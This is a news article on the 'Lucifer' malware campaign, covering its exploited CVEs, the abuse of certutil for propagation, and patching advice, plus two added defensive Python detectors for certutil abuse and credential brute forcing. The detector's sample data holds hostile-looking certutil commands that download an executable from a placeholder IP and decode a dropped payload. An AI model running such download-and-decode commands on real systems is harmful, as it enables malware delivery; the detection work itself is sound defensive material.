"Lucifer" Malware Is Targeting Windows Machines Using NSA Exploits: Protect Yourself Now
Security researchers have discovered a new strain of malware that hijacks vulnerable Windows devices to mine cryptocurrency and launch DDoS attacks.

The malware, dubbed "Lucifer" by its discoverers at cybersecurity firm Palo Alto Networks' Unit 42, tries common usernames and passwords against widely used system ports in order to brute-force its way into a system.

The malware primarily targets corporate servers, but it can also infect personal computers, and a compromised server gives the attacker a foothold from which to spread into the rest of the corporate network.

Unit 42 encountered the malware while investigating exploitation of CVE-2019-9081, a remote code execution vulnerability in the open-source Laravel web application framework.

"Upon closer examination of this malware, which we named 'Lucifer,' we found that it is capable of DDoS attacks and has all kinds of exploits against vulnerable Windows hosts," Unit 42 researchers wrote in a blog post.

(Lucifer's creator calls the malware "Satan DDoS," but Unit 42 chose a different name to avoid confusion with the existing "Satan" ransomware.)

"The first wave of the campaign stopped on June 10, 2020. The attackers then resumed the campaign on June 11, 2020, spreading an upgraded version of the malware and wreaking havoc," the researchers wrote.

The researchers described Lucifer as having "quite powerful capabilities." Once a system is infected, the malware mines the Monero cryptocurrency and spreads to other machines on the local network using the EternalBlue and EternalRomance exploits and the DoublePulsar backdoor, tools stolen from the US National Security Agency and leaked several years ago.

According to the researchers, the operators of Lucifer "weaponize" a long list of known security vulnerabilities.

These vulnerabilities, identified by Common Vulnerabilities and Exposures (CVE) IDs, include CVE-2014-6287 (Rejetto HTTP File Server), CVE-2018-1000861 (Jenkins), CVE-2017-10271 (Oracle WebLogic), CVE-2018-20062 (ThinkPHP remote code execution), CVE-2018-7600 (Drupal), CVE-2017-9791 (Apache Struts 2), CVE-2019-9081 (Laravel), the PHPStudy backdoor remote code execution, CVE-2017-0144 and CVE-2017-0145 (the Windows SMBv1 flaws behind EternalBlue and EternalRomance), and CVE-2017-8464 (Windows .LNK shortcut remote code execution). Note that most of these are flaws in third-party server software rather than in Windows itself.

"These vulnerabilities are rated High or Critical because their exploitation is trivial and their impact on victims is enormous," the researchers explained. Once one of them is exploited, the attacker can execute arbitrary commands on the vulnerable device. In this campaign the targets are Windows hosts on both the internet and on intranets, and the attacker leverages the built-in certutil utility in the payload to propagate the malware.

certutil.exe is a Microsoft command-line utility for managing the digital certificates used to secure internet communication and transactions. Because it can also download a file from a URL and decode Base64-encoded files, attackers routinely abuse it as a trusted, already-installed downloader, and that is how Lucifer uses it. An unexpected certutil launch, particularly one spawned by a web server process, is therefore worth alerting on.
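The certutil abuse pattern described above can be spotted in process-creation telemetry. The following is an added example for this article, not code from Unit 42 or from the malware: it parses constructed records that mimic the fields of a Windows Security event 4688 (process creation), and flags certutil launches that download from a URL, decode an encoded file, or are spawned by a web or application server worker, the kind of parent process the web application exploits listed above would run under. The IP address, paths and parent-process set are placeholders chosen for the example.

```python
"""Flag certutil.exe process launches that match the living-off-the-land
download/decode pattern used for malware propagation.

Added example for this article; not code from Unit 42 or from the malware.
The events below are constructed to mimic the fields of a Windows Security
event 4688 (process creation) record and are not real telemetry; the IP
address and file names are placeholders.
"""
import re
from typing import Dict, List, Tuple

SAMPLE_EVENTS = [
    # 1. certutil used as a downloader: fetch a binary over HTTP to a temp path
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\certutil.exe '
    'ParentProcessName=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="certutil.exe -urlcache -split -f http://192.0.2.10/sp.exe C:\\Windows\\Temp\\sp.exe"',
    # 2. certutil used as a decoder, spawned by a PHP web-server worker (a web
    #    application exploit dropped a Base64 blob and now turns it into an .exe)
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\certutil.exe '
    'ParentProcessName=C:\\php\\php-cgi.exe '
    'CommandLine="certutil /decode C:\\inetpub\\wwwroot\\x.txt C:\\Windows\\Temp\\x.exe"',
    # 3. legitimate administrative use: inspect a certificate, no URL, no decode
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\certutil.exe '
    'ParentProcessName=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="certutil -dump C:\\certs\\root.cer"',
    # 4. unrelated process launch
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\notepad.exe '
    'ParentProcessName=C:\\Windows\\explorer.exe CommandLine="notepad.exe"',
]

# key=value pairs; a value is either a double-quoted string or a run of non-space chars
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# certutil accepts both -switch and /switch; capture the switch name
SWITCH_RE = re.compile(r'(?:^|\s)[-/]([A-Za-z]+)')
URL_RE = re.compile(r'https?://\S+', re.IGNORECASE)

# Parents that have no business launching certutil: web/app server worker
# processes (assumed set for this example; extend it for your environment).
WEB_SERVER_PARENTS = {'w3wp.exe', 'php-cgi.exe', 'httpd.exe', 'nginx.exe', 'java.exe', 'tomcat9.exe'}


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value record into a dict (quoted values keep their spaces)."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerating forward slashes."""
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons a certutil launch looks malicious (empty list = not flagged)."""
    if basename(event.get('NewProcessName', '')) != 'certutil.exe':
        return []
    cmd = event.get('CommandLine', '')
    switches = {m.group(1).lower() for m in SWITCH_RE.finditer(cmd)}
    reasons = []
    url = URL_RE.search(cmd)
    if switches & {'urlcache', 'verifyctl'} and url:      # downloader use
        reasons.append('download: ' + url.group(0))
    if switches & {'decode', 'decodehex'}:               # decoder use
        reasons.append('decode: encoded payload written to disk')
    parent = basename(event.get('ParentProcessName', ''))
    if parent in WEB_SERVER_PARENTS:                     # suspicious parent
        reasons.append('spawned by web server process ' + parent)
    return reasons


def scan(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Run every record through classify() and return (command line, reasons) for hits."""
    findings = []
    for line in lines:
        event = parse_event(line)
        reasons = classify(event)
        if reasons:
            findings.append((event.get('CommandLine', ''), reasons))
    return findings


if __name__ == '__main__':
    for cmdline, reasons in scan(SAMPLE_EVENTS):
        print(cmdline)
        for reason in reasons:
            print('    ' + reason)
```

Only the first two records are flagged: the plain `certutil -dump` run from an administrator's shell produces no reasons, which keeps the rule usable on hosts where certificate management is routine. The switch parsing accepts both the `-` and `/` forms because certutil does, so an attacker cannot dodge the rule by changing the prefix.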

While these vulnerabilities are certainly worrisome, the researchers noted that patches are "readily available" and urged organizations to keep their systems updated to mitigate the attack.

"While the vulnerabilities exploited by this malware and the modus operandi of the attack are not novel, they are a reminder that it is critical to keep systems as up-to-date as possible, eliminate weak credentials, and have a layer of defense for assurance," the researchers wrote.

Whether it is a laptop or a web server, to keep a Windows system from being hit by Lucifer, make sure it is fully patched with the latest Windows security updates (including the 2017 MS17-010 update that closes the SMBv1 flaws EternalBlue and EternalRomance exploit), that any server software it hosts, such as Jenkins, WebLogic, Drupal, Struts or ThinkPHP, is patched against the flaws listed above, and that the administrator's user name and password are strong and unique. That's it.
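The brute-forcing described earlier, common usernames and passwords tried in quick succession against exposed services, shows up in authentication logs well before the malware's other stages do, and it is the failure mode the "eliminate weak credentials" advice above addresses. The following sliding-window detector is an added example for this article, not Unit 42's code; it runs over constructed records that carry only the source address and target account of a Windows Security event 4625 (logon failure), and goes slightly beyond the text by separating password spraying (many accounts from one source) from single-account brute force. The window size, thresholds and addresses are assumptions chosen for the example.

```python
"""Sliding-window detector for credential brute forcing, run over failed-logon
records.

Added example for this article, not code from Unit 42. The records below are
constructed to mimic the source address and target account of Windows
Security event 4625 (logon failure); they are not real telemetry and the
addresses come from documentation ranges.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Tuple

WINDOW = timedelta(seconds=60)  # sliding window per source address (assumed)
BURST_THRESHOLD = 5             # failures inside the window that trigger an alert
SPRAY_USERS = 3                 # distinct accounts inside the window => spraying

# "ISO timestamp,source address,target account"
SAMPLE_FAILURES = [
    # attacker A: common accounts tried back to back (password spray)
    "2020-06-11T08:00:00,198.51.100.7,Administrator",
    "2020-06-11T08:00:02,198.51.100.7,admin",
    "2020-06-11T08:00:04,198.51.100.7,sa",
    "2020-06-11T08:00:06,198.51.100.7,root",
    "2020-06-11T08:00:08,198.51.100.7,guest",
    "2020-06-11T08:00:10,198.51.100.7,Administrator",
    # attacker B: one account hammered (single-account brute force)
    "2020-06-11T08:01:00,192.0.2.44,sa",
    "2020-06-11T08:01:05,192.0.2.44,sa",
    "2020-06-11T08:01:10,192.0.2.44,sa",
    "2020-06-11T08:01:15,192.0.2.44,sa",
    "2020-06-11T08:01:20,192.0.2.44,sa",
    "2020-06-11T08:01:25,192.0.2.44,sa",
    # a user mistyping a password twice: stays under the threshold
    "2020-06-11T08:03:00,203.0.113.5,alice",
    "2020-06-11T08:03:30,203.0.113.5,alice",
    # attacker C: low and slow, one guess every 90 seconds, never fills the window
    "2020-06-11T08:10:00,198.51.100.200,Administrator",
    "2020-06-11T08:11:30,198.51.100.200,Administrator",
    "2020-06-11T08:13:00,198.51.100.200,Administrator",
    "2020-06-11T08:14:30,198.51.100.200,Administrator",
    "2020-06-11T08:16:00,198.51.100.200,Administrator",
    "2020-06-11T08:17:30,198.51.100.200,Administrator",
]


def parse_failure(line: str) -> Tuple[datetime, str, str]:
    """Split one record; account names are case-insensitive on Windows."""
    ts, src, user = line.strip().split(',')
    return datetime.fromisoformat(ts), src, user.lower()


def detect(lines: List[str]) -> Dict[str, dict]:
    """Return {source: details} for every source that reaches BURST_THRESHOLD
    failures within WINDOW. Records are sorted by time first so the window
    logic is correct even when the log is not in order."""
    recent: Dict[str, Deque[Tuple[datetime, str]]] = defaultdict(deque)
    findings: Dict[str, dict] = {}
    for ts, src, user in sorted(parse_failure(line) for line in lines):
        window = recent[src]
        window.append((ts, user))
        while window and ts - window[0][0] > WINDOW:  # drop failures that aged out
            window.popleft()
        if len(window) >= BURST_THRESHOLD and src not in findings:
            users = sorted({u for _, u in window})
            findings[src] = {
                'first_seen': window[0][0].isoformat(),
                'failures_in_window': len(window),
                'accounts': users,
                'pattern': 'password spray' if len(users) >= SPRAY_USERS
                           else 'single-account brute force',
            }
    return findings


if __name__ == '__main__':
    for src, details in detect(SAMPLE_FAILURES).items():
        print(src, details)
```

Attackers A and B are reported; the user who mistyped twice is not. Attacker C is deliberately missed: one guess every 90 seconds never puts five failures inside a 60-second window, which is the blind spot of any fixed-window rule. In practice, pair the burst rule with a longer-horizon count per source (for example, failures per day) and, as the article advises, with credentials strong enough that a slow guesser never succeeds.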

Of course, using good antivirus software also helps; most products already recognize and block Lucifer and its various components.
